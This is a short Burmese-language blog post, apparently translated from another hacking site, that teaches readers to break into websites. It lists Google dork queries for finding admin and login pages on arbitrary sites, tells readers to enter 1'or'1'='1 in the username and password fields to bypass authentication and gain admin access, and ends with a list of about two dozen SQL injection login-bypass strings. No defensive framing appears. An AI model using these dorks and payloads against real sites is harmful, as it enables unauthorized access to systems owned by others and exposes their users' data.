ဆုိဒ္တစ္ခုကုိ အလြယ္နည္းနဲ႕ဟက္ၾကည့္မယ္

Posted by Soe Soe Diary Posted on 12:04 AM with No comments

 

Website တစ္ခုကုိအလြယ္တကူဘယ္လုိဟတ္မလဲဆုိတဲ့ Hackingsec မွာတင္ထားတဲ့ ပုိ႔စ္ေလးကုိသေဘာက်လုိ႔ဘာသာျပန္ေပးလုိက္ပါတယ္ဗ်ာ။ လြယ္ကူတဲ့အျပင္ hacking နဲ႕ပတ္သက္ျပီးအျမင္ေလးတစ္ခုရသြားေစလုိတဲ့အတြက္ေၾကာင့္ပါ။ ရ မရကေတာ့ မေသခ်ာပါဘူး။ :( SQL Query ကုိအသုံးျပဳျပီး ဟတ္တဲ့နည္းပါပဲ။ ကံေကာင္းရင္ ရပါလိမ့္မယ္။ အရင္ဆုံး Google Dork ကုိသုံးျပီး Vul ျဖစ္ေနတဲ့ဆုိဒ္ကုိ ရွာပါမယ္။ သင့္အေနနဲ႕ ဒီထက္ထိေရာက္တဲ့ google dork ေတြကုိအသုံးျပဳႏုိင္ပါတယ္။ ဒါကေတာ့ ကုိယ့္ရဲ႕ Skill ေပၚမူတည္ျပီး ရလာတဲ့ Result ကေတာ့
ကြာျခားသြားမွာေပါ့ေနာ္။

.....Google Dork...

         inurl:adminlogin.aspx
            inurl:admin/index.php
            inurl:administrator.php
            inurl:administrator.asp
            inurl:login.asp
            inurl:login.aspx
            inurl:login.php
            inurl:admin/index.php
            inurl:adminlogin.aspx

ကဲ ဒါဆုိရင္ေတာ့ ဆုိဒ္ေတြအမ်ားၾကီးထဲကတစ္ခုကုိေရြးလုိက္ဗ်ာ။ admin panel မွာ ကြ်န္ေတာ္တုိ႔ ဒီလုိေလးစမ္းၾကည့္ရေအာင္ username ေနရာမွာ 1'or'1'='1 Pass မွာ 1'or'1'='1 လုိ႔ထည့္ျပီးစမ္းၾကည့္ပါ။ ေနာက္တစ္နည္းကေတာ့ username=admin or Admin Pass=1'or'1'='1 ဟုလည္းစမ္းႏုိင္ပါတယ္။ :D

ကဲ ကံေကာင္းရင္ေတာ့ အေထြအထူးလုပ္စရာမလုပ္ပဲ admin access ရသြားပါလိမ့္မယ္။ ဒါဆုိရင္ေတာ့ က်န္တဲ့အပုိင္းကုိဆက္လုိ႔ရပါျပီ။ ကြ်န္ေတာ္ကေတာ့ ခုထိမရေသးပါဘူး။ ဟီး

  ကဲ ကံေကာင္းရင္ေတာ့ အေထြအထူးလုပ္စရာမလုပ္ပဲ admin access ရသြားပါလိမ့္မယ္။ ဒါဆုိရင္ေတာ့ က်န္တဲ့အပုိင္းကုိဆက္လုိ႔ရပါျပီ။ 

 Other InjecTion Queries:

‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)

You might also like: